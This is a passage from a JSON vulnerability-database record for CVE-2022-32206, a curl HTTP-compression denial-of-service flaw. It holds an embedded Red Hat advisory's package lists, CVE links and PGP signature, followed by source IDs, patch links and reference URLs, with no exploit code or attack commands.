24-httpd-tools-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-libcurl-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-libcurl-devel-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-debuginfo-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_md-2.4.0-18.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_md-debuginfo-2.4.0-18.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_security-2.9.3-22.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.3-22.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_session-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-devel-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-devel-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-perl-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-static-1.1.1k-13.el7jbcs.x86_64.rpm\n\nRed Hat JBoss Core Services on RHEL 8:\n\nSource:\njbcs-httpd24-apr-util-1.6.1-99.el8jbcs.src.rpm\njbcs-httpd24-curl-7.86.0-2.el8jbcs.src.rpm\njbcs-httpd24-httpd-2.4.51-37.el8jbcs.src.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.src.rpm\njbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el8jbcs.src.rpm\njbcs-httpd24-mod_md-2.4.0-18.el8jbcs.src.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.src.rpm\njbcs-httpd24-mod_security-2.9.3-22.el8jbcs.src.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.src.rpm\njbcs-httpd24-openssl-1.1.1k-13.el8jbcs.src.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.src.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.src.rpm\n\nnoarch:\njbcs-httpd24-httpd-manual-2.4.51-37.el8jbcs.noarch.rpm\n\nx86_64:\njbcs-httpd24-apr-util-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-devel-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-curl-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-curl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-devel-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-selinux-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-tools-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-tools-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-devel-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-debuginfo-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_md-2.4.0-18.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_md-debuginfo-2.4.0-18.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_security-2.9.3-22.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.3-22.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_session-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_session-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-devel-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-devel-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-perl-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-static-1.1.1k-13.el8jbcs.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-22721\nhttps://access.redhat.com/security/cve/CVE-2022-23943\nhttps://access.redhat.com/security/cve/CVE-2022-26377\nhttps://access.redhat.com/security/cve/CVE-2022-28330\nhttps://access.redhat.com/security/cve/CVE-2022-28614\nhttps://access.redhat.com/security/cve/CVE-2022-28615\nhttps://access.redhat.com/security/cve/CVE-2022-30522\nhttps://access.redhat.com/security/cve/CVE-2022-31813\nhttps://access.redhat.com/security/cve/CVE-2022-32206\nhttps://access.redhat.com/security/cve/CVE-2022-32207\nhttps://access.redhat.com/security/cve/CVE-2022-32208\nhttps://access.redhat.com/security/cve/CVE-2022-32221\nhttps://access.redhat.com/security/cve/CVE-2022-35252\nhttps://access.redhat.com/security/cve/CVE-2022-42915\nhttps://access.redhat.com/security/cve/CVE-2022-42916\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBY5ISE9zjgjWX9erEAQixuA//dX5Q3wtu2MRvrjD/sK/r6dqBz4fWWhS9\nws2A8cRa5ki3RlCaYQ3pP7LkRtIdankAP3HG1NU4er/odsMEW5aEgku+5foV7w4M\nWEd0USLKs3Pw5a7/3TjOBUf5CA7oet03C7/u9idWaLD/ip4UMhskSnz33qFQSFZf\nFAWNdsRhH8+ql6qFMg9Odv5RFX3i2+wBy5pC69Akr2FBEt9j+/PbvSPWuPD26n6H\n0l+QUKrI3OW1EHzz+S/8aEfTFKLluXfhVJn61wdA8Kjs4ZKrnBz8czJjxn4hOi7a\nz0tpzg5d1BJEf/UB7EdyyLBGRIliWhf978qtG8QS37GEgnQSof2xgcfu1NGiHl9j\nypCqX1R4oOkeoISynnZUKWZ1uFp5GkMiRtPu0Bw7WYB6z/8OWZce4yIqh1rcG09d\nNcyleabDtpJ7C3BJQzpnhXAWjri7oJ6wHBvcbQ9sLj2xkQRX2Zpi0KJGIH8iLwdn\nIk+RIZ7u/mXeW3ulcwiQTPYbTQLWGXqgZV1qxJq91HIcu+y3STQwZjb4fZuqjH5M\nonO/rF2y50l9LqArg/v9KAJUbHSKMDP6r7Dx02J+iKjW3g7NczoImrU7JcyAgce9\nmCN7gMmU9bQx1tagIKcKKW5IVN/jHyWKJW/t0teoaECsa2LMgoEIt+6RcmQXWpdF\n6t6oQh+b3NY=UGfz\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. Bugs fixed (https://bugzilla.redhat.com/):\n\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32206"
},
{
"db": "VULMON",
"id": "CVE-2022-32206"
},
{
"db": "PACKETSTORM",
"id": "168538"
},
{
"db": "PACKETSTORM",
"id": "168275"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168347"
},
{
"db": "PACKETSTORM",
"id": "170083"
},
{
"db": "PACKETSTORM",
"id": "170166"
},
{
"db": "PACKETSTORM",
"id": "172765"
},
{
"db": "PACKETSTORM",
"id": "168284"
}
],
"trust": 1.71
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-32206",
"trust": 2.5
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2023/02/15/3",
"trust": 1.6
},
{
"db": "HACKERONE",
"id": "1570651",
"trust": 1.6
},
{
"db": "SIEMENS",
"id": "SSA-333517",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "168347",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170166",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168284",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.3366",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6333",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6290",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4468",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4757",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3143",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3238",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4324",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5247",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4266",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4112",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3117",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5632",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.2163",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5300",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4525",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4568",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "167607",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "168301",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "168174",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "168503",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "168378",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "169443",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022071152",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062927",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-32206",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168538",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168275",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170083",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172765",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32206"
},
{
"db": "PACKETSTORM",
"id": "168538"
},
{
"db": "PACKETSTORM",
"id": "168275"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168347"
},
{
"db": "PACKETSTORM",
"id": "170083"
},
{
"db": "PACKETSTORM",
"id": "170166"
},
{
"db": "PACKETSTORM",
"id": "172765"
},
{
"db": "PACKETSTORM",
"id": "168284"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
},
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"id": "VAR-202206-1900",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5566514
},
"last_update_date": "2026-04-10T23:28:19.708000Z",
"patch": {
"_id": null,
"data": [
{
"title": "curl Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=198520"
},
{
"title": "Ubuntu Security Notice: USN-5495-1: curl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5495-1"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-32206"
},
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-770",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.6,
"url": "https://hackerone.com/reports/1570651"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2022/oct/41"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2023/02/15/3"
},
{
"trust": 1.6,
"url": "https://www.debian.org/security/2022/dsa-5197"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20220915-0003/"
},
{
"trust": 1.6,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2022/oct/28"
},
{
"trust": 1.6,
"url": "https://support.apple.com/kb/ht213488"
},
{
"trust": 1.6,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2022-32206"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-32208"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/curl-denial-of-service-via-http-compression-38671"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062927"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213488"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168347/red-hat-security-advisory-2022-6422-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6290"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168301/red-hat-security-advisory-2022-6287-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168174/red-hat-security-advisory-2022-6157-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4112"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5300"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170166/red-hat-security-advisory-2022-8840-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168378/red-hat-security-advisory-2022-6507-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5247"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3366"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168503/red-hat-security-advisory-2022-6560-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4757"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167607/ubuntu-security-notice-usn-5495-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.2163"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022071152"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3238"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168284/red-hat-security-advisory-2022-6183-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4266"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-32206/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5632"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4468"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4324"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4525"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169443/red-hat-security-advisory-2022-7058-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3117"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4568"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-29154"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2526"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2015-20107"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-30629"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0391"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-32148"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1705"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2526"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-30631"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-36067"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32148"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1705"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30698"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-38561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-0256"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24795"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30699"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0934"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-0308"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5495-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21123"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
